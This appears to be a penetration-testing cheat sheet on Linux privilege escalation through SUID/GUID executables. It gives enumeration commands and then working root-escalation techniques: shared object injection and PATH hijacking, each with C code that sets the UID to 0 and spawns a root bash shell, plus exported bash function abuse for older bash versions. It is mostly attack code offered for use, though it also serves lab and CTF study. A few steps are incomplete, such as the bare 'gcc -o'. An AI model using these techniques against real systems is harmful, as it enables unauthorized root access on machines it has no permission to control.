Skip to content

SUID and GUID Executables

Find files with guid or suid set
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
See which commands/executables a file is trying to run
strings <program>
Confirm which executable/command a program is trying to run
strace -v -f -e execve <program> 2>&1 | grep executable/command
ltrace <program>
Check file for missing shared objects
ld <executable>
Update cache to include new shared objects
ldconfig
  • Check GTFOBins for flags to use in order to execute malicious commands
  • Binary being called is not absolute (scp vs /usr/bin/scp)

Shared object not found

  • Vulnerable to shared object injection
  • Find shared objects that are not found by the executable
  • Create a shared object in the directory where the shared object is being searched for
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setresuid(0, 0, 0);
    system("/bin/bash");
}

gcc: error trying to exec 'cc1': execvp: No such file or directory

Check environment variables to make sure PATH has been set: export

If PATH has not been set, then set it: export PATH

File calls for executable without absolute path

  • We can add a malicious version of the executable to our PATH.
  • Create a malicious executable with the same name as the program that is being called without an absolute path
int main() {
    setuid(0);
    system("/bin/bash -p");
}

Compile with: gcc -o

  • export PATH=.:$PATH
  • Execute vulnerable SUID/GUID

Calls for executable w/ absolute path and bash < 4.2-048

  • function { /bin/bash -p; }
  • export -f
  • execute vulnerable suid/guid file